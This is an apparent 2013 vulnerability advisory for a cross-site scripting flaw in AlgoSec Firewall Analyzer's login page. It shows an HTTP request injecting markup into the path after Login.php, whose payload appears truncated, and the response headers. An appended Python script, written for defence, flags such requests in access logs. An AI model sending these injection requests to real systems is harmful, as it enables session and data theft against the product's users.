AlgoSec Firewall Analyzer Version v6.1-b86 cross-site scripting (XSS) Vulnerability
================================================================================

#Date- 7/8/2013
# code by Asheesh kumar Mani Tripathi
# Credit by Asheesh Anaconda

#Vulnerability

AlgoSec Firewall Analyzer is prone to a cross-site scripting (XSS) vulnerability because the application fails to properly sanitize user-supplied input.

#Impact

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities

================================================================================
Request
================================================================================

GET /afa/php/Login.php/>'> HTTP/1.1
Host: 172.28.154.163
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: PHPSESSID=3ihq73ut5ivc5spnnbm65vuiu1

================================================================================
Response
================================================================================

HTTP/1.1 200 OK
Date: Wed, 7 Aug 2013 15:59:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
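
An added detection example, not part of the original advisory: it flags access-log entries where the extra path segments after a `.php` script contain HTML metacharacters, which is the shape of the request shown above. The log lines are constructed, and the Apache common log format and all function names are assumptions.

```python
import re
from urllib.parse import unquote

# Request line inside an Apache common/combined log entry (format is an assumption).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A .php script followed by extra path segments (PATH_INFO), before any query string.
PATH_INFO_RE = re.compile(r'^(?P<script>/[^?#]*?\.php)(?P<info>/[^?#]*)', re.I)
HTML_META = set('<>"\'')

def decode_fully(value, rounds=3):
    """Percent-decode repeatedly so double-encoded characters are also seen."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_path_info(log_line):
    """Return (script, decoded PATH_INFO) if it carries HTML metacharacters, else None."""
    request = REQUEST_RE.search(log_line)
    if not request:
        return None
    parts = PATH_INFO_RE.match(request.group(1))
    if not parts:
        return None  # no path segments after the script name
    info = decode_fully(parts.group('info'))
    if HTML_META & set(info):
        return parts.group('script'), info
    return None

# Constructed sample entries: raw, double-encoded, and two benign requests.
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Aug/2013:15:59:23 +0000] "GET /afa/php/Login.php/>\'> HTTP/1.1" 200 512',
    '192.0.2.11 - - [07/Aug/2013:16:00:01 +0000] "GET /afa/php/Login.php/%253E%2527%253E HTTP/1.1" 200 512',
    '192.0.2.12 - - [07/Aug/2013:16:00:05 +0000] "GET /afa/php/Login.php HTTP/1.1" 200 498',
    '192.0.2.13 - - [07/Aug/2013:16:00:09 +0000] "GET /afa/php/Login.php/help HTTP/1.1" 200 498',
]

def scan(lines):
    """Return (line_number, script, path_info) for every flagged entry."""
    hits = []
    for number, line in enumerate(lines, start=1):
        found = suspicious_path_info(line)
        if found:
            hits.append((number, *found))
    return hits

if __name__ == '__main__':
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Path segments after a script name are rarely legitimate on a login page, so a hit here is worth reviewing even when the response was a plain 200.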